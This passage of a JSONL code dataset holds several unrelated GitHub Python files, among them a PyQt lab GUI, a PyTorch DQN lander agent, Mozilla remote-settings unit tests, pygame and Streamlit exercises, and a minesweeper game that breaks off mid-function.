self.fluBox.timeRow(self.channelsTriggered)\n else:\n plist = []\n if hasattr(self, 'sbBox'):\n xyzlist = self.sbBox.timeRow(self.runSimple)\n else:\n xyzlist = []\n self.saveTable.append([tnow]+plist+xyzlist)\n \n def discardSaveTable(self) -> None:\n '''throw out the table and stop recording'''\n if hasattr(self, 'timer') and self.timer.isActive():\n self.timer.stop()\n self.ending = False\n self.save = False\n\n def writeSaveTable(self) -> None:\n '''save the table to csv'''\n \n if self.save:\n if hasattr(self, 'timer') and self.timer.isActive():\n self.timer.stop()\n self.ending = False\n self.save = False\n with open(self.fileName, mode='w', newline='', encoding='utf-8') as c:\n writer = csv.writer(c, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n phead = self.fluBox.timeHeader(self.channelsTriggered)\n xyzhead = self.sbBox.timeHeader(self.runSimple)\n writer.writerow(['time(s)']+phead+xyzhead) # header\n for row in self.saveTable:\n writer.writerow(row)\n self.sbBox.updateStatus(f'Saved {self.fileName}', True)\n \n \n \n #----------------\n # close the window\n \n def closeEvent(self, event):\n '''runs when the window is closed. Disconnects everything we connected to.'''\n logging.info('Closing boxes.')\n if hasattr(self, 'timer') and self.timer.isActive():\n self.timer.stop()\n for o in self.boxes():\n if hasattr(o, 'close'):\n o.close()\n else:\n logging.info(f'No close function in {o}')\n for handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\n logging.info('Done closing boxes.')\n self.close()\n\n\nclass MainProgram(QWidget):\n '''The main application widget. Here, we can set fonts, icons, window info'''\n \n def __init__(self, meta:bool=True, sb:bool=True, flu:bool=True, cam:bool=True, file:bool=True, calib:bool=True, convert:bool=True, test:bool=False): \n \n app = QApplication(sys.argv)\n sansFont = QFont(\"Arial\", 9)\n app.setFont(sansFont)\n self.sbwin = SBwindow(meta=meta, sb=sb, flu=flu, cam=cam, file=file, test=test, calib=calib, convert=convert)\n\n \n self.sbwin.show()\n self.sbwin.setWindowIcon(icon('sfcicon.ico'))\n app.setWindowIcon(icon('sfcicon.ico'))\n app.exec_()\n \n \n myappid = cfg.appid # arbitrary string\n ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)\n \n \n \n\n \n ","repo_name":"usnistgov/ShopbotPyQt","sub_path":"pythonGUI/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":15392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"31012866688","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 25 14:53:22 2022\r\n\r\n\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.optim as optim\r\nimport torch.nn.functional as F\r\n\r\n\r\n\r\nclass DQN(nn.Module):\r\n \r\n def __init__(self, learn_rate, inputs, input_size, hidden_size, output_size):\r\n super(DQN, self).__init__() #Inherit all methods from pytorches nn.Module\r\n self.inputs = inputs #set the inputs\r\n self.input_size = input_size #Set the input size\r\n self.hidden_size = hidden_size #set the size of the hiddern layer\r\n self.output_size = output_size #set the output size\r\n \r\n self.input_layer = nn.Linear(*self.inputs, self.input_size) #create the input layer\r\n self.hidden_layer = nn.Linear(self.input_size, self.hidden_size) #create the hidden layer\r\n self.output_layer = nn.Linear(self.hidden_size, self.output_size) #Create the output layer\r\n \r\n self.optimizer = optim.Adam(self.parameters(), 
lr = learn_rate) #create the optimzier\r\n self.loss = nn.MSELoss()\r\n \r\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu') #Set the device \r\n self.to(self.device) #Make it easy to use device\r\n \r\n \r\n def forward(self, state): #Feedward function\r\n out = F.sigmoid(self.input_layer(state)) #Parse the input into the input layers\r\n out = F.sigmoid(self.hidden_layer(out)) #Take the output from the input layer to feedward prograte through hiddern\r\n out = self.output_layer(out) #Output of hidden layer to parse through the output layer to find output of network\r\n \r\n return out\r\n \r\n \r\n \r\n \r\n \r\n \r\nclass Lander():\r\n \r\n def __init__(self, gamma, epsilon, learn_rate, input_size, batch, output_size, input_layer_size, hidden_layer_size):\r\n \r\n self.memory_size = 10000 #set the size of memory\r\n self.epsiode = 0.01 #Set the \r\n self.epsiode_constant = 5e-4\r\n self.learn_rate = learn_rate #Set the Learning rate\r\n self.actions = [i for i in range(output_size)] #create the actions\r\n self.batch_size = batch #set the batch\r\n self.memory_count = 0 #Set the memory count to 0\r\n \r\n self.gamma = gamma #set the gamma\r\n self.epsilon = epsilon #Set the epsilon to 1.0 as it will decrease\r\n \r\n self.model = DQN(self.learn_rate, input_size, input_layer_size, hidden_layer_size, output_size) #Add the model\r\n \r\n self.memory = np.zeros((self.memory_size, *input_size), dtype=np.float32) #Create the memory for the DQN Agent was made from Machine Learning with Phill (2020).\r\n self.input_state_memory = np.zeros((self.memory_size, *input_size), dtype=np.float32) \r\n \r\n self.action_memory = np.zeros(self.memory_size, dtype=np.int32)\r\n self.reward_memory = np.zeros(self.memory_size, dtype=np.float32)\r\n self.terminal_memory = np.zeros(self.memory_size, dtype=np.bool)\r\n \r\n \r\n def transition(self, state, action, reward, new_state, done):\r\n \r\n index = self.memory_count % self.memory_size #This memeory function is from Machine Learning with Phill (2020). \r\n self.memory[index] = state\r\n self.input_state_memory[index] = new_state\r\n self.reward_memory[index] = reward\r\n self.action_memory[index] = action\r\n self.terminal_memory[index] = done\r\n \r\n self.memory_count = self.memory_count + 1\r\n \r\n def decision(self, new_state):\r\n \r\n if np.random.random() > self.epsilon: #This memeory function is from Machine Learning with Phill (2020). \r\n state = torch.tensor([new_state]).to(self.model.device)\r\n actions = self.model.forward(state)\r\n action = torch.argmax(actions).item()\r\n else:\r\n action = np.random.choice(self.actions)\r\n \r\n return action\r\n \r\n def preprocess(self):\r\n self.max_mem = min(self.memory_count, self.memory_size) #This memeory function is from Machine Learning with Phill (2020). \r\n self.batch = np.random.choice(self.max_mem, self.batch_size, replace=False)\r\n \r\n self.state_batch = torch.tensor(self.memory[self.batch]).to(self.model.device)\r\n self.new_state_batch = torch.tensor(self.input_state_memory[self.batch]).to(self.model.device)\r\n self.reward_batch = torch.tensor(self.reward_memory[self.batch]).to(self.model.device)\r\n self.terminal_batch = torch.tensor(self.terminal_memory[self.batch]).to(self.model.device)\r\n \r\n self.action_batch = self.action_memory[self.batch]\r\n \r\n \r\n \r\n def find_Q(self):\r\n self.batch_index = np.arange(self.batch_size, dtype=np.int32) #This memeory function is from Machine Learning with Phill (2020). 
\r\n model = self.model.forward(self.state_batch)[self.batch_index, self.action_batch]\r\n q_next = self.model.forward(self.new_state_batch)\r\n q_next[self.terminal_batch] = 0.0\r\n q_target = self.reward_batch + self.gamma * torch.max(q_next, dim=1)[0]\r\n\r\n return q_target, model\r\n \r\n \r\n def learn(self):\r\n \r\n if self.memory_count < self.batch_size: #If memory count is less then the batch size return\r\n return \r\n \r\n self.model.optimizer.zero_grad() #Optimizer the model\r\n \r\n self.preprocess() #preprocess the data and store the data for the DQN\r\n \r\n q_target, model = self.find_Q() #Apply the policys on the Model\r\n \r\n loss = self.model.loss(q_target, model).to(self.model.device) #Find the loss\r\n loss.backward() #change the weights depending on the output of the model\r\n self.model.optimizer.step() #Apply ADAM optimizer\r\n \r\n self.epsilon = self.epsilon - self.epsiode_constant if self.epsilon > self.epsiode \\\r\n else self.epsiode # This line is from Machine Learning with Phill (2020). \r\n \r\n \r\n \r\n \r\n\"\"\"\r\nMachine Learning with Phill (2020). \r\nDeep Q Learning is Simple with PyTorch | Full Tutorial 2020. [online] Available at: https://www.youtube.com/watch?v=wc-FxNENg9U&t=1403s [Accessed 1 Apr. 2022] \r\n\"\"\" \r\n \r\n \r\n \r\n","repo_name":"sliverpool555/LandingRocketOpenAI","sub_path":"LanderV4.py","file_name":"LanderV4.py","file_ext":"py","file_size_in_byte":6855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3987399631","text":"import os\nimport tempfile\nimport unittest\nfrom unittest import mock\n\nimport requests\nimport responses\nfrom kinto_http import Client\n\nfrom commands.publish_dafsa import (\n BUCKET_ID,\n BUCKET_ID_PREVIEW,\n COLLECTION_ID,\n COMMIT_HASH_URL,\n LIST_URL,\n MAKE_DAFSA_PY,\n PREPARE_TLDS_PY,\n RECORD_ID,\n download_resources,\n get_latest_hash,\n get_stored_hash,\n prepare_dafsa,\n publish_dafsa,\n remote_settings_publish,\n)\n\n\nclass TestsGetLatestHash(unittest.TestCase):\n @responses.activate\n def test_get_latest_hash_returns_sha1_hash(self):\n responses.add(responses.GET, COMMIT_HASH_URL, json=[{\"sha\": \"hash\"}])\n latest_hash = get_latest_hash(COMMIT_HASH_URL)\n self.assertEqual(latest_hash, \"hash\")\n\n @responses.activate\n def test_HTTPError_raised_when_404(self):\n responses.add(\n responses.GET, COMMIT_HASH_URL, json={\"error\": \"not found\"}, status=404\n )\n with self.assertRaises(requests.exceptions.HTTPError) as e:\n get_latest_hash(COMMIT_HASH_URL)\n self.assertEqual(e.status_code, 404)\n\n\nclass TestDownloadResources(unittest.TestCase):\n def test_all_files_downloaded_with_correct_names(self):\n with tempfile.TemporaryDirectory() as tmp:\n download_resources(tmp, PREPARE_TLDS_PY, MAKE_DAFSA_PY, LIST_URL)\n self.assertEqual(\n sorted(os.listdir(tmp)),\n sorted([\"public_suffix_list.dat\", \"prepare_tlds.py\", \"make_dafsa.py\"]),\n )\n\n @responses.activate\n def test_HTTPError_raised_when_404(self):\n with tempfile.TemporaryDirectory() as tmp:\n responses.add(\n responses.GET, PREPARE_TLDS_PY, json={\"error\": \"not found\"}, status=404\n )\n with self.assertRaises(requests.exceptions.HTTPError) as e:\n download_resources(tmp, PREPARE_TLDS_PY)\n self.assertEqual(e.status_code, 404)\n\n\nclass TestGetStoredHash(unittest.TestCase):\n def setUp(self):\n server = \"https://fake-server.net/v1\"\n auth = (\"arpit73\", \"pAsSwErD\")\n self.client = Client(\n server_url=server, auth=auth, bucket=BUCKET_ID, 
collection=COLLECTION_ID\n )\n self.record_uri = server + self.client.get_endpoint(\n \"record\", id=RECORD_ID, bucket=BUCKET_ID, collection=COLLECTION_ID\n )\n\n @responses.activate\n def test_stored_hash_fetched_successfully(self):\n responses.add(\n responses.GET,\n self.record_uri,\n json={\"data\": {\"commit-hash\": \"fake-commit-hash\"}},\n )\n stored_hash = get_stored_hash(self.client)\n self.assertEqual(stored_hash, \"fake-commit-hash\")\n\n @responses.activate\n def test_returns_none_when_no_record_found(self):\n responses.add(\n responses.GET, self.record_uri, json={\"error\": \"not found\"}, status=404\n )\n self.assertIsNone(get_stored_hash(self.client))\n\n\nclass TestPrepareDafsa(unittest.TestCase):\n def test_file_is_created_in_output_folder(self):\n with tempfile.TemporaryDirectory() as tmp:\n output_binary_path = prepare_dafsa(tmp)\n self.assertIn(os.path.basename(output_binary_path), os.listdir(tmp))\n self.assertGreater(os.path.getsize(output_binary_path), 0)\n\n def test_exception_is_raised_when_process_returns_non_zero(self):\n with tempfile.TemporaryDirectory() as tmp:\n with mock.patch(\"subprocess.Popen\") as mocked:\n mocked.return_value.returncode = 1\n with self.assertRaises(Exception) as e:\n prepare_dafsa(tmp)\n self.assertIn(\"DAFSA Build Failed\", str(e.exception))\n\n\nclass TestRemoteSettingsPublish(unittest.TestCase):\n def setUp(self):\n server = \"https://fake-server.net/v1\"\n auth = (\"arpit73\", \"pAsSwErD\")\n self.client = Client(\n server_url=server, auth=auth, bucket=BUCKET_ID, collection=COLLECTION_ID\n )\n record_uri = server + self.client.get_endpoint(\n \"record\", id=RECORD_ID, bucket=BUCKET_ID, collection=COLLECTION_ID\n )\n self.collection_uri = server + self.client.get_endpoint(\n \"collection\", bucket=BUCKET_ID, collection=COLLECTION_ID\n )\n self.attachment_uri = f\"{record_uri}/attachment\"\n\n @responses.activate\n def test_record_was_posted(self):\n responses.add(\n responses.POST,\n self.attachment_uri,\n json={\"data\": {\"commit-hash\": \"fake-commit-hash\"}},\n )\n responses.add(\n responses.PATCH, self.collection_uri, json={\"data\": {\"status\": \"to-review\"}}\n )\n\n with tempfile.TemporaryDirectory() as tmp:\n dafsa_filename = f\"{tmp}/dafsa.bin\"\n with open(dafsa_filename, \"wb\") as f:\n f.write(b\"some binary data\")\n remote_settings_publish(self.client, \"fake-commit-hash\", dafsa_filename)\n\n self.assertEqual(len(responses.calls), 2)\n\n self.assertEqual(responses.calls[0].request.url, self.attachment_uri)\n self.assertEqual(responses.calls[0].request.method, \"POST\")\n\n self.assertEqual(responses.calls[1].request.url, self.collection_uri)\n self.assertEqual(responses.calls[1].request.method, \"PATCH\")\n\n\nclass TestPublishDafsa(unittest.TestCase):\n def setUp(self):\n self.event = {\n \"server\": \"https://fake-server.net/v1\",\n \"auth\": \"arpit73:pAsSwErD\",\n }\n client = Client(\n server_url=self.event.get(\"server\"),\n auth=(\"arpit73\", \"pAsSwErD\"),\n bucket=BUCKET_ID,\n collection=COLLECTION_ID,\n )\n self.record_uri = self.event.get(\"server\") + client.get_endpoint(\n \"record\", id=RECORD_ID, bucket=BUCKET_ID, collection=COLLECTION_ID\n )\n self.record_uri_preview = self.event.get(\"server\") + client.get_endpoint(\n \"record\", id=RECORD_ID, bucket=BUCKET_ID_PREVIEW, collection=COLLECTION_ID\n )\n\n mocked = mock.patch(\"commands.publish_dafsa.prepare_dafsa\")\n self.addCleanup(mocked.stop)\n self.mocked_prepare = mocked.start()\n\n mocked = 
mock.patch(\"commands.publish_dafsa.remote_settings_publish\")\n self.addCleanup(mocked.stop)\n self.mocked_publish = mocked.start()\n\n @responses.activate\n def test_prepare_and_publish_are_not_called_when_hashes_matches(self):\n responses.add(\n responses.GET, COMMIT_HASH_URL, json=[{\"sha\": \"fake-commit-hash\"}]\n )\n responses.add(\n responses.GET,\n self.record_uri,\n json={\"data\": {\"commit-hash\": \"fake-commit-hash\"}},\n )\n\n publish_dafsa(self.event, context=None)\n\n self.assertFalse(self.mocked_prepare.called)\n self.assertFalse(self.mocked_publish.called)\n\n @responses.activate\n def test_prepare_and_publish_not_called_when_pending_review(self):\n responses.add(\n responses.GET, COMMIT_HASH_URL, json=[{\"sha\": \"fake-commit-hash\"}]\n )\n responses.add(\n responses.GET,\n self.record_uri,\n json={\"data\": {\"commit-hash\": \"different-fake-commit-hash\"}},\n )\n responses.add(\n responses.GET,\n self.record_uri_preview,\n json={\"data\": {\"commit-hash\": \"fake-commit-hash\"}},\n )\n\n publish_dafsa(self.event, context=None)\n\n self.assertFalse(self.mocked_prepare.called)\n self.assertFalse(self.mocked_publish.called)\n\n @responses.activate\n def test_prepare_and_publish_are_called_when_hashes_do_not_match(self):\n responses.add(\n responses.GET, COMMIT_HASH_URL, json=[{\"sha\": \"fake-commit-hash\"}]\n )\n responses.add(\n responses.GET,\n self.record_uri,\n json={\"data\": {\"commit-hash\": \"different-fake-commit-hash\"}},\n )\n responses.add(\n responses.GET,\n self.record_uri_preview,\n json={\"data\": {\"commit-hash\": \"different-fake-commit-hash\"}},\n )\n\n publish_dafsa(self.event, context=None)\n\n self.assertTrue(self.mocked_prepare.called)\n self.assertTrue(self.mocked_publish.called)\n","repo_name":"mozilla-services/remote-settings-lambdas","sub_path":"tests/test_publish_dafsa.py","file_name":"test_publish_dafsa.py","file_ext":"py","file_size_in_byte":8293,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"22620693384","text":"from tarfile import DEFAULT_FORMAT\r\nimport pygame\r\nimport os\r\n\r\nSCREEN_WIDTH = 640\r\nSCREEN_HEIGHT = 480\r\n\r\n\r\nDEFAULT_FONT = \"Arial\"\r\nWHITE = (255,255,255)\r\nBLACK = (0,0,0)\r\nRED = (255,0,0)\r\nGREEN = (0,255,0)\r\nBLUE = (0,0,255)\r\nCYAN = (0,255,255)\r\nPURPLE = (255,0,255) \r\nYELLOW = (255,255,0)\r\nORRANGE = (255,100,0)\r\n\r\ndef main():\r\n pygame.init()\r\n main_surface = pygame.display.set_mode([SCREEN_WIDTH,SCREEN_HEIGHT])\r\n main_surface.fill(BLACK)\r\n display_text(main_surface,\"12\",12,RED,123,123)\r\n pygame.time.wait(5000)\r\n \r\n while(True):\r\n for event in pygame.event.get():\r\n if(event.type == pygame.QUIT):\r\n break\r\n main_surface.fill(BLACK)\r\n my_group.update()\r\n my_group.draw()\r\n pygame.display.flip()\r\n pygame.quit()\r\n\r\nclass Ball(pygame.sprit.Sprite):\r\n def __init__(self, position):\r\n self.image = pygame.image.load('ball.png')\r\n self.rect = self.image.get_rect()\r\n self.rect.center = position\r\n self.velocity = [1,1]\r\n \r\n def update(self):\r\n self.rect.move_ip(self.velocity)\r\n\r\ndef display_text(surface,text,size,p_color,x,y):\r\n font = pygame.font.SysFont(DEFAULT_FONT,size)\r\n text_surface = font.render(text,True,p_color)\r\n text_rect = text_surface.get_rect()\r\n text_rect.midtop = (x,y)\r\n surface.blit(text_surface,text_rect)\r\n pygame.display.flip()\r\n\r\nif(__name__ == \"__main__\"):\r\n main()","repo_name":"Nicholas-Mooney/pynotes","sub_path":"py 
folder/pygamepractice.py","file_name":"pygamepractice.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10370325929","text":"from random import choices\nfrom string import ascii_letters\n\nimport dash_bootstrap_components as dbc\nimport dash_html_components as html\nfrom dash_table import DataTable\n\n\ndef random_string():\n return ''.join(choices(ascii_letters, k=10))\n\n\ndef mk_card(title, obj, hint=''):\n obj_id = random_string()\n return dbc.Card(\n dbc.CardBody([\n html.H4(title, id=obj_id),\n dbc.Tooltip(hint, target=obj_id),\n html.Div([obj])\n ])\n )\n\n\ndef mk_empty_datatable(table_id):\n return DataTable(\n id=table_id,\n style_as_list_view=True,\n editable=False,\n filter_action=\"native\",\n sort_action=\"native\",\n sort_mode=\"multi\",\n page_action=\"native\",\n page_current=0,\n page_size=10,\n style_header={\n 'font-family': 'Rubik, sans-serif;',\n 'font-style': 'normal',\n 'font-weight': 'bold',\n 'font-size': '16px;',\n 'line-height': '22px;',\n 'display': 'flex;',\n 'align-items': 'center;',\n 'letter-spacing': '0.15px;',\n 'margin': '1px 9px;',\n 'backgroundColor': 'white',\n 'fontWeight': 'bold',\n 'textAlign': 'left'\n },\n style_cell={\n 'font-family': 'Roboto Mono, sans-serif;',\n 'font-style': 'normal',\n 'font-weight': 'normal',\n 'font-size': '14px;',\n 'line-height': '22px;',\n 'display': 'flex;',\n 'align-items': 'center;',\n 'letter-spacing': '0.15px;',\n 'backgroundColor': '#262421;',\n 'margin': '1px 9px;',\n 'flex': 'none;',\n 'order': '0;',\n 'textAlign': 'center'\n },\n style_cell_conditional=[\n {\n 'if': {'column_id': c},\n 'textAlign': 'left'\n } for c in ['ESPECIALIDADE_INTERNACAO']\n ]\n )","repo_name":"rgiglio/python-engeco","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4475564768","text":"from ants.engine import AntEngine\nimport pygame\nimport time\n\n\nclass FieldHandler(object):\n\n def __init__(self, resolution=(800, 800), grid_size=25, food_quant=100,\n spawn_ants=True, startants=25, colony_count=1):\n\n self.grid_size = grid_size\n\n # assuming square grid!!\n self.field_size = resolution[0] / self.grid_size\n\n self.engine = AntEngine(\n start_ants=startants,\n grid_size_x=self.grid_size,\n grid_size_y=self.grid_size,\n food_quant=food_quant,\n inf_food=False,\n min_food=5000,\n max_food=5000,\n spawn_ants=spawn_ants,\n ant_ai=True,\n colony_count=colony_count\n )\n\n self.grid = self.engine.grid\n\n self.run_engine = False\n\n def get_field(self, pos):\n '''calculate coordinates from click pos and return corresponding field\n from engine grid'''\n x = int(pos[0] / self.field_size)\n y = int(pos[1] / self.field_size)\n return self.grid.fields.get((x, y))\n\n def click(self, pos):\n '''add food to clicked field'''\n field = self.get_field(pos)\n if field is not None:\n field.food += 1000\n\n def right_click(self, pos):\n '''toggle clicked field blocked attribute'''\n field = self.get_field(pos)\n if field is not None:\n field.blocked = not field.blocked\n\n def colour_field(self, field):\n '''calculate colour of field from ant count, food and blocked attribute\n '''\n\n red = 0\n green = 0\n blue = 0\n\n field_surface = pygame.Surface(\n (self.field_size, self.field_size)\n )\n\n if field.is_home:\n green = 255\n\n if field.food > 0:\n red = 255\n\n if field.antcount < 0:\n 
field.antcount = 0\n\n ant_count = field.antcount\n ants_count = float(self.engine.ants_count)\n if ants_count != 0 and ant_count > 0:\n blue = int(10 * 255 * (ant_count / ants_count ** (0.7)))\n if blue > 255:\n blue = 255\n\n # blocked fields are white!\n if field.blocked:\n red = 255\n blue = 255\n green = 255\n\n pygame.draw.rect(\n field_surface,\n (red, green, blue, 0),\n (0, 0, self.field_size, self.field_size)\n )\n field_surface = field_surface.convert_alpha()\n\n pos = (\n field.x * self.field_size,\n field.y * self.field_size\n )\n\n return field_surface, pos\n\n def draw_fields(self, display):\n '''called from pygame_main, run engine and put coloured fields on\n display'''\n\n if self.run_engine:\n self.engine.tick()\n\n for field in self.grid.fields.values():\n field_surface, pos = self.colour_field(field)\n display.blit(field_surface, pos)\n\n return display\n","repo_name":"gandie/Ants","sub_path":"ants/pygame_adapter.py","file_name":"pygame_adapter.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"37947517213","text":"import openpyxl\n\n#link absolute file path\nwb = openpyxl.load_workbook(\"balance.xlsx\")\nws = wb['Sheet1']\n\n#created a generator object\nrows = ws.iter_rows(min_row=1,max_row=7,min_col=1,max_col=2)\n\nnames = []\nbalance = []\nfor a,b in rows:\n names.append(a.value)\n balance.append(b.value)\n\nprint(names)\nprint(balance)\n\ncolumns = ws.iter_cols(min_row=1,max_row=5,min_col=1,max_col=2)\n#Tuple for each column\nfor col in columns:\n print(col)\n\n#All rows and all columns\nrows = list(ws.rows)\ncolumns = list(ws.column)\n","repo_name":"jtmar28/Learning-Openpyxl","sub_path":"Iterate and Read Rows/iter_functions.py","file_name":"iter_functions.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72108078963","text":"# streamlit import 웹 퍼블리싱\nimport streamlit as st\nimport numpy as np\nimport pandas as pd\n\n# add 간단한 문자열을 출력\nst.title('안녕하세요')\nst.write('데이터프레임 구성, 테이블을 만들어 보자.')\nst.write(pd.DataFrame({\n 'column1': [1,2,3,4],\n 'column2': [10,20,30,40]\n}))\n\n# use magic\n\"\"\"\n# 안녕하세요, 신주연입니다.\n데이터프레임 구성, 테이블을 만들어 보자.\n\"\"\"\n\ndf = pd.DataFrame({\n '학 번': [2001,2002,2003,2004],\n '성 명': ['홍길동','춘향이','갑돌이','갑순이']\n})\ndf\n\n# 차트와 지도 그리기\n# line chart\nchart_data = pd.DataFrame(\n np.random.randn(20, 3),\n columns = ['A', 'B', 'C']\n)\n\nst.line_chart(chart_data)\n\n#plot map\nmap_data = pd.DataFrame(\n np.random.randn(10, 2) / [50, 50] + [36.643910, 127.487607],\n columns = ['lat', 'lon']\n)\n\nst.map(map_data)","repo_name":"jooyeon-shin/shin","sub_path":"appstream/first_app.py","file_name":"first_app.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"24274669541","text":"import pickle\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport numpy as np\nimport networkx as nx\nfrom scipy import sparse\nimport pylab as plt\nimport dateutil.parser as dparser\nimport re\n\ndef save_object(obj, filename):\n with open(filename, 'wb') as output: # Overwrites any existing file.\n pickle.dump(obj, output, 2)\n\ndef load_object(filename):\n output = 0\n with open(filename, 'rb') as fp:\n output = pickle.load(fp)\n return output\n\ndef edgelist2numEdge(edgelist):\n num_edges = len(set(edgelist))\n return num_edges\n\ndef 
edgelist2weights(edgelist):\n unique_edges = list(set(edgelist))\n weights = [0]*len(unique_edges)\n for edge in edgelist:\n weights[unique_edges.index(edge)] += 1\n return weights\n\ndef edgelist2degrees(edgelist):\n unique_nodes = []\n for (u,v) in edgelist:\n if u not in unique_nodes:\n unique_nodes.append(u)\n if v not in unique_nodes:\n unique_nodes.append(v)\n \n degrees = [0]*len(unique_nodes)\n for (u,v) in edgelist:\n degrees[unique_nodes.index(u)] +=1\n degrees[unique_nodes.index(v)] +=1\n return degrees\n\n\n\n\n\n\n\n\n","repo_name":"shenyangHuang/multiLAD","sub_path":"util/normal_util.py","file_name":"normal_util.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"10547873851","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets\nfrom Models.BatchRegression import BatchRegression\nfrom Utils import Predictions\n\ndef r2(y_actual, y_predicted):\n y_bar = np.mean(y_actual)\n numerator = sum((y_actual - y_predicted)**2)\n dominator = sum((y_actual - y_bar)**2)\n r2 = 1 - (numerator/dominator)\n return r2\n\nn_samples = 100\nn_features = 1\nnoise = 0\nrandom_state = 42\nX, y = datasets.make_regression(n_samples=n_samples, n_features=n_features, noise=noise, random_state=random_state)\nplt.scatter(X,y, color='blue')\n\nw = BatchRegression.linear_regression(X,y)\ny_predicted = Predictions._compute_predictions_(X,w)\n\nr2 = r2(y, y_predicted)\nprint(r2)\nplt.plot(X, y_predicted, color='blue')\nplt.show()\n\n","repo_name":"mabushaera/OLR-WA_Project","sub_path":"VisualizedDemos/06R-Squared.py","file_name":"06R-Squared.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19256934539","text":"import random\r\nimport pymysql as sql\r\nimport time\r\n\r\n\r\n\r\nclass Square:\r\n '''\r\n This is the constructor. The instance variable counter will keep track of the number of bombs adjacent to the square.\r\n The instance variable bomb will keep track of whether the square contains a bomb or not. The instance variable open indicates\r\n whether the box has been opened or not. The flag variable is a user option, so they can mark squares they believe to be bombs\r\n '''\r\n\r\n def __init__(self, counter, bomb, open, flag):\r\n self.counter=counter\r\n self.bomb = bomb\r\n self.open = open\r\n self.flag = flag\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef initialize_array(num_bombs):\r\n '''\r\n This function does two things. It determines the counter values for each square. 
It also randomly allocates the bombs\r\n accross the minesweeper board\r\n '''\r\n\r\n \r\n # Generating an array of unique random values so that the mines can be allocated randomly to cells\r\n a = []\r\n for i in range(0, num_bombs):\r\n mine_location = random.randint(0, (max_rows * max_rows)-1)\r\n while mine_location in a:\r\n mine_location = random.randint(0, (max_rows * max_rows)-1)\r\n a.append(mine_location)\r\n\r\n # assigning bombs to the appropriate index within the matrix\r\n for i in range(0, len(a)):\r\n row = int(a[i] / max_rows)\r\n column = a[i] % max_rows\r\n M[row][column].bomb = \"B\"\r\n\r\n # finding the cells that do not have mines so we can update the instance counter variable for them\r\n for i in range(0, max_rows):\r\n for j in range(0, max_rows):\r\n if M[i][j].bomb != \"B\":\r\n\r\n # basically checking a 3x3 grid area around each of these cells\r\n for s in [i-1, i, i+1]:\r\n for k in [j-1, j, j+1]:\r\n\r\n # Conditions to make sure it does sure does not check element out of range of array\r\n if ((0 <= s < max_rows) and (0 <= k < max_rows) and M[s][k].bomb == \"B\"):\r\n M[i][j].counter = M[i][j].counter + 1\r\n \r\n # printing out a map of all the instance counter variables. This is to check if we properly updated the counter variables.\r\n for i in range(0, max_rows):\r\n for j in range(0, max_rows):\r\n if j == 0:\r\n print(\"\\n\")\r\n print(M[i][j].counter, end = ' ')\r\n print(\"\\n\")\r\n\r\n # prints out a map of where all the mines are located. This is to check if we properly updated the bomb variables.\r\n for i in range(0, max_rows):\r\n for j in range(0, max_rows):\r\n if j == 0:\r\n print(\"\\n\")\r\n print(M[i][j].bomb, end = ' ')\r\n\r\n print(\"\\n\")\r\n\r\n\r\ndef open_square(row,column):\r\n '''\r\n This function is enacted when the user wants to open a cell. It recursively goes through every cell from the intial\r\n point and stop running in one direction, once we reach a cell that holds a non-zero counter variable.\r\n '''\r\n\r\n global num_open_square\r\n global lost_flag\r\n\r\n # Checks if user put a logical numeric value and if the box is closed\r\n if(0 <= row < max_rows and 0 <= column < max_rows and M[row][column].open == \"X\"):\r\n\r\n # We first open up the cell the user specified, we also update the the number of opened squares by one\r\n M[row][column].open = \"O\"\r\n num_open_square = num_open_square + 1\r\n\r\n # If the user selected a bomb, the function ends and user loses\r\n if M[row][column].bomb == \"B\":\r\n lost_flag = 1\r\n # If the user selects a spaces that has a counter variable of 0, then we recursively check in all four directions\r\n # The recursion ends when we hit a counter variable that is a non-zero value\r\n elif M[row][column].counter == 0:\r\n open_square(row - 1, column)\r\n open_square(row + 1, column)\r\n open_square(row, column - 1)\r\n open_square(row, column + 1)\r\n \r\n \r\n\r\n\r\n#Type in user information\r\ndef intro_screen():\r\n '''\r\n This function requests the user for their personal information to see if they have an account. If they have an account,\r\n the function will let the user know and there will be no change to PLAYER_TBL. 
